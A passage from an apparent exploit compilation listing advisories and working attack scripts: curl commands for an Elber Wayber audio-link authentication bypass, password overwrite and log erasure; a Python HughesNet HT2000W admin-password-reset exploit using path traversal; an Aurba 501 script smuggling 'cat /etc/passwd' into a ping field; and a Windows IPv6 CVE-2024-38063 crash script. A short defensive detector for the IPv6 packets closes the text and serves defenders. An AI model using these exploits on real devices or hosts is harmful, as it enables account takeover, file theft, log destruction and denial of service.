# =-2  Yesterday
# =-8  Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month

# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully

# Show factory window and FPGA upload (Console)
> cleber_show_factory_wnd()

# Etc.
```
21. Elber Wayber Analog/Digital Audio STL 4.00 Authentication Bypass

Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501)
                  Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516)
                  Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516)
                  Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501)
                  Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350)
                  Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342)
                  Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131)

Summary: Wayber II is the name of an analogue/digital microwave link able to transport a Mono or a MPX stereo signal from studio to audio transmitter. Compact and reliable, it features very high quality and modern technology both in signal processing and microwave section leading to outstanding performances.

Desc: The device suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint that enables them to overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application compromising the device's system security.

```
--------------------------------------------------------------------------
/modules/pwd.html
------------------

50: function apply_pwd(level, pwd)
51: {
52:     $.get("json_data/set_pwd", {lev:level, pass:pwd},
53:     function(data){
54:         //$.alert({title:'Operation',text:data});
55:         show_message(data);
56:     }).fail(function(error){
57:         show_message('Error ' + error.status, 'error');
58:     });
59: }
--------------------------------------------------------------------------
```

Tested on: NBFM Controller embOS/IP

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience

Advisory ID: ZSL-2024-5822
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5822.php

18.08.2023

--

```
$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234
```

Ref (lev param):

```
Level 7 = SNMP Write Community (snmp_write_pwd)
Level 6 = SNMP Read Community (snmp_read_pwd)
Level 5 = Custom Password? hidden. (custom_pwd)
Level 4 = Display Password (display_pwd)?
Level 2 = Administrator Password (admin_pwd)
Level 1 = Super User Password (puser_pwd)
Level 0 = User Password (user_pwd)
```
22. HughesNet HT2000W Satellite Modem (Arcadyan httpd 1.0) - Password Reset

```
# Exploit Title: HughesNet HT2000W Satellite Modem (Arcadyan httpd 1.0) - Password Reset
# Date: 7/16/24
# Exploit Author: Simon Greenblatt <simongreenblatt[at]protonmail.com>
# Vendor: HughesNet
# Version: Arcadyan httpd 1.0
# Tested on: Linux
# CVE: CVE-2021-20090

import sys
import requests
import re
import base64
import hashlib
import urllib.parse

red = "\033[0;41m"
green = "\033[1;34;42m"
reset = "\033[0m"

def print_banner():
    # The ASCII-art banner lost its layout in extraction; kept as published, on one line
    print(green + ''' _____________ _______________ _______________ ________ ____ _______________ _______ _______________ \_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \/_ | \_____ \ _ \ \ _ \/ __ \ _ \ / \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ | | ______ / ____/ /_\ \/ /_\ \____ / /_\ \ \ \____\ / | \ /_____/ / \ \_/ \/ \ | | /_____/ / \ \_/ \ \_/ \ / /\ \_/ \ \______ / \___/ /_______ / \_______ \_____ /\_______ \|___| \_______ \_____ /\_____ //____/ \_____ / \/ \/ \/ \/ \/ \/ \/ \/ \/ \n''' + reset)
    print(" Administrator password reset for HughesNet HT2000W Satellite Modem")
    print('''
    Usage: python3 hughes_ht2000w_pass_reset.py <password> <ip_address>

    <password>: The new administrator password
    <ip_address>: The IP address of the web portal. If none is provided, the script will default to 192.168.42.1

    This script takes advantage of CVE-2021-20090, a path traversal vulnerability in the HTTP daemon of the HT2000W modem,
    to reset the administrator password of the configuration portal.
    It also takes advantage of other vulnerabilities in the device such as improper use of httokens for authentication
    and the portal allowing the MD5 hash of the password to be leaked.''')
    return None

def get_httoken(ip_address):
    # Make a GET request to system_p.htm using path traversal
    r = requests.get(f'http://{ip_address}/images/..%2fsystem_p.htm')
    if r.status_code != 200:
        print(red + "(-) Failure: Could not request system_p.htm" + reset)
        exit()
    # Extract the httoken hidden in the DOM and convert it from Base64
    return base64.b64decode(re.search(r'AAAIBRAA7(.*?)"', r.text).group(1)).decode('ascii')

def encode_pass(password):
    # Vigenere Cipher (as the author describes it): each character is summed with a key byte
    key = "wg7005d"
    enc_pass = ""
    idx = 0
    for c in password:
        enc_pass += str(ord(c) + ord(key[idx])) + "+"
        idx = (idx + 1) % len(key)
    return enc_pass

def change_pass(ip_address, httoken, enc_pass):
    # Create a POST request with the httoken and the encoded password
    headers = {'Content-Type': 'application/x-www-form-urlencoded',
               'Referer': f'http://{ip_address}/system_p.htm'}
    payload = {'action': 'ui_system_p',
               'httoken': httoken,
               'submit_button': 'system_p.htm',
               'ARC_SYS_Password': enc_pass}
    payload = urllib.parse.urlencode(payload, safe=':+')
    try:
        r = requests.post(f'http://{ip_address}/images/..%2fapply_abstract.cgi', data=payload, headers=headers)
    except:
        pass
    return None

def verify_pass(ip_address, new_pass):
    # Make a GET request to cgi_sys_p.js to verify the password
    httoken = get_httoken(ip_address)
    headers = {'Referer': f'http://{ip_address}/system_p.htm'}
    r = requests.get(f'http://{ip_address}/images/..%2fcgi/cgi_sys_p.js?_tn={httoken}', headers=headers)
    if r.text.split('"')[5] != hashlib.md5(bytes(new_pass, 'ascii')).hexdigest():
        print(red + "(-) Failure: Could not verify the hash of the password" + reset)
        exit()

def main():
    if not (len(sys.argv) == 2 or len(sys.argv) == 3):
        print_banner()
        return
    new_pass = sys.argv[1]
    ip_address = "192.168.42.1"
    if len(sys.argv) == 3:   # published copy compared sys.argv itself to 3, so the address argument was never used
        ip_address = sys.argv[2]
    httoken = get_httoken(ip_address)
    print(f"[+] Obtained httoken: {httoken}")
    enc_pass = encode_pass(new_pass)
    change_pass(ip_address, httoken, enc_pass)
    print(f"[+] Password reset to: {new_pass}")
    verify_pass(ip_address, new_pass)
    print("[+] Verified password hash: " + hashlib.md5(bytes(new_pass, 'ascii')).hexdigest())
    print("[+] Password successfully changed!")
    return

if __name__ == '__main__':
    main()
```
23. Elber Wayber Analog/Digital Audio STL 4.00 Device Config

Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501)
                  Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516)
                  Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516)
                  Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501)
                  Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350)
                  Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342)
                  Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131)

Summary: Wayber II is the name of an analogue/digital microwave link able to transport a Mono or an MPX stereo signal from studio to audio transmitter. Compact and reliable, it features very high quality and modern technology in both the signal processing and microwave sections, leading to outstanding performance.

Desc: The device exposes its configuration endpoints without authentication and discloses hidden functionality on the client side: the json_data handlers below accept fan, configuration, upgrade, log-erase and RX-configuration commands from any unauthenticated caller, and a factory/FPGA-upload window can be opened from the browser console.

Tested on: NBFM Controller
           embOS/IP

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2024-5823
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5823.php

18.08.2023

--

```
# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied

# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully

# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully

# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased

# Until:
# =0   ALL
# =-2  Yesterday
# =-8  Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month

# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully

# Show factory window and FPGA upload (Console)
> cleber_show_factory_wnd()

# Etc.
```
24. Remote Command Execution | Aurba 501

```
# Exploit Title: Remote Command Execution | Aurba 501
# Date: 17-07-2024
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.hpe.com
# Version: Aurba 501 CN12G5W0XX
# Tested on: Linux

import requests
from requests.auth import HTTPBasicAuth

def get_input(prompt, default_value):
    user_input = input(prompt)
    return user_input if user_input else default_value

base_url = input("Enter the base URL: ")
if not base_url:
    print("Base URL is required.")
    exit(1)

username = get_input("Enter the username (default: admin): ", "admin")
password = get_input("Enter the password (default: admin): ", "admin")

login_url = f"{base_url}/login.cgi"
login_payload = {
    "username": username,
    "password": password,
    "login": "Login"
}
login_headers = {
    "Accept-Encoding": "gzip, deflate, br",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": base_url,
    "Connection": "close"
}

session = requests.Session()
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

# Login to the system
response = session.post(login_url, headers=login_headers, data=login_payload, verify=False)

# Check if login was successful
if response.status_code == 200 and "login failed" not in response.text.lower():
    print("Login successful!")

    # The command to be executed on the device
    command = "cat /etc/passwd"
    ping_ip = f"4.2.2.4||{command}"

    # Data to be sent in the POST request
    data = {
        "ping_ip": ping_ip,
        "ping_timeout": "1",
        "textareai": "",
        "ping_start": "Ping"
    }

    # Headers to be sent with the request
    headers = {
        "Accept-Encoding": "gzip, deflate, br",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": base_url,
        "Referer": f"{base_url}/admin.cgi?action=ping",
        "Connection": "close"
    }

    # Sending the HTTP POST request to exploit the vulnerability
    exploit_url = f"{base_url}/admin.cgi?action=ping"
    response = session.post(exploit_url, headers=headers, data=data, verify=False)

    if any("root" in value for value in response.headers.values()):
        print("Exploit successful! The /etc/passwd file contents are reflected in the headers:")
        print(response.headers)
    else:
        print("Exploit failed. The response headers did not contain the expected output.")
else:
    print("Login failed. Please check the credentials and try again.")

# Print the response headers for further analysis
print(response.headers)
```
25. Windows IPv6 CVE-2024-38063 Checker and Denial-Of-Service

```
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Exploit Title: Windows IPv6 CVE-2024-38063 Checker and Denial-Of-Service
# Date: 2024-08-07
# Exploit Author: Photubias
# Vendor Homepage: https://microsoft.com
# Vendor Advisory: [1] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063
# Version: Windows 10, 11 <10.0.26100.1457 and Server 2016-2019-2022 <10.0.17763.6189
# Tested on: Windows 11 23H2 and Windows Server 2022
# CVE: CVE-2024-38063

import os, subprocess, re, time, sys

## Variables
sDstIP = 'fe80::78b7:6283:49ad:c565' ## Placeholder
if len(sys.argv) > 1: sDstIP = sys.argv[1] ## Please provide an argument
sDstMAC = '00:0C:29:55:E1:C8' ## Not required, will try to get the MAC via Neighbor Discovery
iBatches = 20
iCorruptions = 20 ## How many times do we want to corrupt the tcpip.sys memory per batch

try:
    print('--- Loading Scapy, might take some time ...')
    from scapy.config import conf
    conf.ipv6_enabled = False
    import scapy.all as scapy
    scapy.conf.verb = 0
except:
    print('Error while loading scapy, please run "pip install scapy"')
    exit(1)
import logging
logging.getLogger('scapy.runtime').setLevel(logging.ERROR)

def selectInterface():
    #adapter[] = npfdevice, ip, mac
    def getAllInterfaces():
        lstInterfaces = []
        if os.name == 'nt':
            proc = subprocess.Popen('getmac /NH /V /FO csv | FINDSTR /V /I disconnected', shell=True, stdout=subprocess.PIPE)
            for bInterface in proc.stdout.readlines():
                lstInt = bInterface.split(b',')
                sAdapter = lstInt[0].strip(b'"').decode()
                sDevicename = lstInt[1].strip(b'"').decode()
                sMAC = lstInt[2].strip(b'"').decode().lower().replace('-', ':')
                sWinguID = lstInt[3].strip().strip(b'"').decode()[-38:]
                proc = subprocess.Popen('netsh int ipv6 show addr "{}" | FINDSTR /I Address'.format(sAdapter), shell=True, stdout=subprocess.PIPE)
                try: sIP = re.findall(r'[\w:]+:+[\w:]+', proc.stdout.readlines()[0].strip().decode())[0]
                except: sIP = ''
                if len(sMAC) == 17: lstInterfaces.append([sAdapter, sIP, sMAC, sDevicename, sWinguID]) # When no or bad MAC address (e.g. PPP adapter), do not add
        else:
            proc = subprocess.Popen('for i in $(ip address | grep -v "lo" | grep "default" | cut -d":" -f2 | cut -d" " -f2);do echo $i $(ip address show dev $i | grep "inet6 " | cut -d" " -f6 | cut -d"/" -f1) $(ip address show dev $i | grep "ether" | cut -d" " -f6);done', shell=True, stdout=subprocess.PIPE)
            for bInterface in proc.stdout.readlines():
                lstInt = bInterface.strip().split(b' ')
                try:
                    if len(lstInt[2]) == 17: lstInterfaces.append([lstInt[0].decode(), lstInt[1].decode(), lstInt[2].decode(), '', ''])
                except: pass
        return lstInterfaces

    lstInterfaces = getAllInterfaces()
    if len(lstInterfaces) > 1:
        i = 1
        for lstInt in lstInterfaces: #array of arrays: adapter, ip, mac, windows devicename, windows guID
            print('[{}] {} has {} ({})'.format(i, lstInt[2], lstInt[1], lstInt[0]))
            i += 1
        sAnswer = input('[?] Please select the adapter [1]: ') ## the published copy had this prompt commented out and sAnswer hard-coded to '3'
    else:
        sAnswer = None
    if not sAnswer or sAnswer == '' or not sAnswer.isdigit() or int(sAnswer) >= i:
        sAnswer = 1
    iAnswer = int(sAnswer) - 1
    sNPF = lstInterfaces[iAnswer][0]
    sIP = lstInterfaces[iAnswer][1]
    sMAC = lstInterfaces[iAnswer][2]
    if os.name == 'nt': sNPF = r'\Device\NPF_' + lstInterfaces[iAnswer][4]
    return (sNPF, sIP, sMAC, lstInterfaces[iAnswer][3])

def get_packets(iID, sDstIPv6, sDstMac=None):
    iFragID = 0xbedead00 + iID
    oPacket1 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrDestOpt(options=[scapy.PadN(otype=0x81, optdata='bad')])
    oPacket2 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m=1, offset=0) / 'notalive'
    oPacket3 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m=0, offset=1)
    if sDstMac: ## Should always be this, it seems sending to 'ff:ff:ff:ff:ff:ff' does not work
        oPacket1 = scapy.Ether(dst=sDstMac) / oPacket1
        oPacket2 = scapy.Ether(dst=sDstMac) / oPacket2
        oPacket3 = scapy.Ether(dst=sDstMac) / oPacket3
    return [oPacket1, oPacket2, oPacket3]

def doIPv6ND(sDstIP, sInt):
    ## Try to get a MAC address via IPv6 Neighbor Solicitation
    sMACResp = None
    oNeighborSolicitation = scapy.IPv6(dst=sDstIP) / scapy.ICMPv6ND_NS(tgt=sDstIP) / scapy.ICMPv6NDOptSrcLLAddr(lladdr='ff:ff:ff:ff:ff:ff')
    oResponse = scapy.sr1(oNeighborSolicitation, timeout=5, iface=sInt)
    if oResponse and scapy.ICMPv6NDOptDstLLAddr in oResponse:
        sMACResp = oResponse[scapy.ICMPv6NDOptDstLLAddr].lladdr
    return sMACResp

lstInt = selectInterface() ## NPF, IPv6, MAC, Name
sMAC = doIPv6ND(sDstIP, lstInt[0])
if sMAC:
    print(f'[+] Target {sDstIP} is reachable, got MAC Address {sMAC}')
    sDstMAC = sMAC
elif sDstMAC != '':
    print('[-] Target not responding to Neighbor Solicitation Packets, using the provided MAC {}'.format(sDstMAC))
else:
    print('[-] Without a MAC address, this exploit will probably not work')

lstPacketsToSend = []
for i in range(iBatches):
    for j in range(iCorruptions):
        lstPacketsToSend += get_packets(j, sDstIP, sDstMAC) + get_packets(j, sDstIP, sDstMAC)

## 'send' is Layer3 (let scapy figure out the MAC address), 'sendp' is L2 (MAC address is filled in, much better)
print('[i] Verifying vulnerability against IPv6 address {}'.format(sDstIP))
## Verification first: "ICMPv6ParamProblem"
lstResp = scapy.srp1(lstPacketsToSend[0], iface=lstInt[0], timeout=5)
if lstResp and scapy.IPv6 in lstResp[0] and scapy.ICMPv6ParamProblem in lstResp[0]:
    print('[+] Yes, {} is vulnerable and exploitable for CVE-2024-38063'.format(sDstIP))
else:
    input('[-] Not vulnerable or firewall is enabled. Please verify and rerun or press enter to continue')
print('[i] Waiting 10 seconds to let the target cool down (more is better)')
time.sleep(10)
input('[?] OK, continue to execute the Denial Of Service (BSOD)? Press Ctrl+C to cancel now')

########## Exploit
print('[+] Sending {} packets now via interface {} {}'.format(len(lstPacketsToSend), lstInt[0], lstInt[3]))
scapy.conf.verb = 1
scapy.sendp(lstPacketsToSend, iface=lstInt[0])
print('[+] All packets are sent, now it takes *exactly* 60 seconds for the target to crash')
```
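A defender-side check added here (not part of Photubias' script) for the two packet shapes the checker above sends: a Destination Options header carrying an unknown option whose action bits request an ICMPv6 Parameter Problem, and a non-first fragment with no data behind the fragment header. The walker follows the RFC 8200 header layouts without Scapy; the three sample frames are constructed by hand for the test, not captured traffic.

```python
import struct
from collections import defaultdict

# Constructed sample frames (hand-encoded per RFC 8200, not captured traffic): one of each shape
SRC = bytes.fromhex("fe80000000000000000000000000000a")
DST = bytes.fromhex("fe80000000000000000000000000000b")

def ipv6(nh, payload):
    # version 6, flow label 1 (as in the script), payload length, next header, hop limit 64
    return struct.pack("!IHBB", 0x60000001, len(payload), nh, 64) + SRC + DST + payload

FRAG_ID = 0xBEDEAD00
# Destination Options: next=59 (none), ext len 0, option type 0x81 len 3 "bad", then Pad1
DESTOPT = ipv6(60, bytes([59, 0, 0x81, 3]) + b"bad" + b"\x00")
# First fragment: offset 0, M=1, eight bytes of data
FRAG1 = ipv6(44, struct.pack("!BBHI", 59, 0, 0x0001, FRAG_ID) + b"notalive")
# Final fragment: offset 1, M=0, and no data at all behind the fragment header
FRAG2 = ipv6(44, struct.pack("!BBHI", 59, 0, 0x0008, FRAG_ID))

def inspect(frame):
    """Walk the extension-header chain of one raw IPv6 frame; return anomaly strings."""
    findings = []
    nh, off = frame[6], 40
    while off < len(frame):
        if nh == 60:                                  # Destination Options header
            hlen = (frame[off + 1] + 1) * 8
            p = off + 2
            while p < off + hlen:
                otype = frame[p]
                if otype == 0:                        # Pad1 carries no length byte
                    p += 1
                    continue
                # action bits 10 = "discard and send ICMPv6 Parameter Problem";
                # an unknown option with those bits is what the checker probes with
                if otype & 0xC0 == 0x80:
                    findings.append(f"dstopt unknown option 0x{otype:02x} forcing ICMPv6 Param Problem")
                p += 2 + frame[p + 1]
            nh, off = frame[off], off + hlen
        elif nh == 44:                                # Fragment header
            fnh, _, offm, fid = struct.unpack("!BBHI", frame[off:off + 8])
            offset, data_len = offm >> 3, len(frame) - off - 8
            if offset > 0 and data_len == 0:
                findings.append(f"empty non-first fragment id=0x{fid:08x} offset={offset}")
            nh, off = fnh, off + 8
        else:                                         # upper-layer protocol: stop walking
            break
    return findings

def scan(frames):
    """Group findings by destination address so a burst against one host stands out."""
    per_dst = defaultdict(list)
    for frame in frames:
        per_dst[frame[24:40].hex()].extend(inspect(frame))
    return dict(per_dst)
```

A single Parameter Problem trigger is normal IPv6 behaviour; what merits an alert is many such frames plus empty trailing fragments aimed at one destination in a short window, which `scan` surfaces per address.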